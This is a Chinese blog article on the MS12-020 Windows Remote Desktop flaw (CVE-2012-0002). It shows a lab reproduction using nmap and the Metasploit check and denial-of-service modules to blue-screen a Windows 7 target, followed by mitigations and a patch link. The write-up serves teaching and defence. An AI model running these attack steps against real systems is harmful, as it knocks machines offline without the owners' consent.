CVE-2012-0002

这篇具有很好参考价值的文章主要介绍了CVE-2012-0002。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

CVE-2012-0002-Microsoft Windows远程桌面协议代码执行漏洞(MS12-020)(死亡蓝屏)

漏洞说明

该漏洞为Windows下2012年爆出高危安全漏洞,该漏洞是因为Windows系统的远程桌面协议(RDP, Remote Desktop Protocol)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏,利用起来操作简单,危害极大,影响范围极广。
远程桌面协议访问内存中未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在目标系统上运行任意代码,攻击者可随后安装程序,查看、更改或删除数据,或者创建拥有完全用户权限的新帐户。

漏洞受影响的版本:

安装开启了RDP的
Microsoft Windows XP Professional 
Microsoft Windows XP Home/
Microsoft Windows Server 2003 Standard Edition 
Microsoft Windows Server 2003 Enterprise Edition 
Microsoft Windows Server 2003 Datacenter Edition 
Microsoft Windows 7

复现

测试环境:靶机 开启了3389端口 远程桌面连接的 Windows 7
攻击机 Kali

在Windows 7上开启3389端口 远程桌面连接服务 关闭防火墙
CVE-2012-0002

使用nmap进行信息搜集,发现开启3389端口

CVE-2012-0002

启动 msfconsole

search ms12-020 
# 查找漏洞payload

CVE-2012-0002

使用第一个模块对靶机进行扫描是否存在 ms12-020 漏洞
use 0
# 使用序号为 0 的模块
show options
# 展示参数
set rhost IP
# 设置靶机 IP
run
# 运行

回显显示 The target is vulnerable 证明存在此漏洞

CVE-2012-0002

使用第二个模块进行攻击测试
use 1
show options
set rhost IP
run

运行后 Windows 7 靶机蓝屏 证明攻击成功

CVE-2012-0002

CVE-2012-0002

漏洞修复

3389端口不开启任意用户连接,选择身份验证的连接
在系统属性 远程模块下 选择网络级别身份验证

CVE-2012-0002
如不需要远程桌面连接业务直接关闭3389端口 远程桌面连接服务
CVE-2012-0002
安装补丁文章来源地址https://www.toymoban.com/news/detail-513561.html

安装针对此漏洞的补丁

https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020?redirectedfrom=MSDN

到了这里,关于CVE-2012-0002的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Windows 2012 配置远程桌面帐户允许多用户同时登录

    Windows Server 2008之后的操作系统默认只能存在一个用户会话,通过以下设置,可以开启多用户同时登陆服务器。 1、启用远程桌面 打开任务栏左下角的“服务器管理器”,在左侧列表中选中“本地服务器”或者在\\\"我的电脑“上右键属性---远程设置。 然后将右侧“远程桌面”功

    2024年02月11日
    浏览(50)
  • 远程桌面连接Windows Server 2012报错:身份验证错误,要求的函数不受支持

    有一台服务器,是Windows Server 2012版本,通过远程桌面访问的时候,提示:身份验证错误,要求的函数不受支持,无法登录。   到服务器查看是否开启远程桌面,可以查看到系统属性已经勾选允许远程连接到此计算机,所以说通行证是可以了,就是门票是否有效而已,如下图

    2024年02月11日
    浏览(82)
  • Windows Server 2012 R2系统服务器远程桌面服务多用户登录配置分享

    Windows Server 2012系统在没有安装远程多界面的情况下,最多只能同时运行2个远程桌面,如果是有多个技术员、合伙人同时操作或是像游戏开发需要用到多界面,但是没有安装就很不方便,今天飞飞来和你们分享Windows server 2012R2系统远程多界面的安装方法,安装好后可以3个用户

    2024年02月05日
    浏览(56)
  • win2008 rdp停止服务 - windows server 2012 R2 远程桌面授权模式尚未配置,远程桌面服务将在120天内停止工作

    windows server 2008作为测试环境跳板机,但是没有配置官方的rdp授权,限制用户登录数,限制使用rdp服务的可授权使用时长(120天) 作为GUI环境的综合跳板机,发现至少配置以下内容才能满足使用需要(机房环境统一GUI入口审核) 不限制用户登录数 不限值rdp登录时长 用户隔离

    2024年02月04日
    浏览(58)
  • 【超级实用多用户配置】Windows Server 2012 如何实现多个用户远程桌面登陆(2016也适用)

    目录 实现办法: 1、 安装桌面会话主机和远程桌面授权 2、 web申请激活码 3、 激活终端服务 4、 配置远程桌面会话主机授权服务器 5、配置远程桌面会话主机授权模式 6、验证: 背景: Windows Server 2012默认情况下,只运行2个用户远程桌面登陆,这里我们可以通过安装远程桌面

    2024年02月13日
    浏览(44)
  • Windows server 2012 R2系统服务器远程桌面服务激活服务器RD授权分享

    上期我分享了Windows server 2012 R2系统服务器远程桌面服务的安装教程,若是没有激活服务器获得RD授权只有120天的有效期,到期需要重新安装,这期飞飞和你分享Windows server 2012R2系统服务器远程桌面服务激活服务器RD授权的方法,希望可以帮助到你~ 1、在仪表板中单击【远程桌

    2024年02月04日
    浏览(53)
  • CVE-2018-0886-Microsoft Windows CredSSP 远程执行代码漏洞复现

    cve-2018-0886,网络

    2024年02月12日
    浏览(34)
  • iPad远程控制Windows PC - Microsoft远程桌面

    有时我们坐在客厅里,想来一局游戏,怎奈何主机太远,接不上电视,这个时候我们就可以利用iPad当作中继器,插上电视,享受大屏带来的震撼...... 有时我们躺在床上,不想到电脑上玩游戏,我们就可以用iPad远程游戏,低延迟也可以让我们大展拳脚...... Microsoft远程桌面详细

    2024年02月06日
    浏览(41)
  • CVE-2022-21907 Microsoft Windows HTTP 协议栈远程代码执行漏洞复现

    目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: 下载: 开启IIS: 0x06 漏洞复现: 利用POC: 0x07 流量分析: 客户端: 0x08 修复建议:         仅供学习参考使用,请勿用作违法用途,否则后果自负。         Microsoft Windows HTTP 协议栈(HTTP.

    2024年02月03日
    浏览(58)
  • Mac电脑远程连接Windows桌面Microsoft Remote Desktop

    怎么用Mac电脑远程控制Windows呢?Microsoft Remote Desktop是一款运行在Mac平台上的微软远程桌面连接工具,配置连接时,Microsoft远程桌面允许您决定应使用的分辨率,颜色质量,全屏模式,是否要全屏启动会话,是否使用所有尖视器,或者内容应该缩放。使用这款软件用户就可以轻

    2024年02月02日
    浏览(54)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包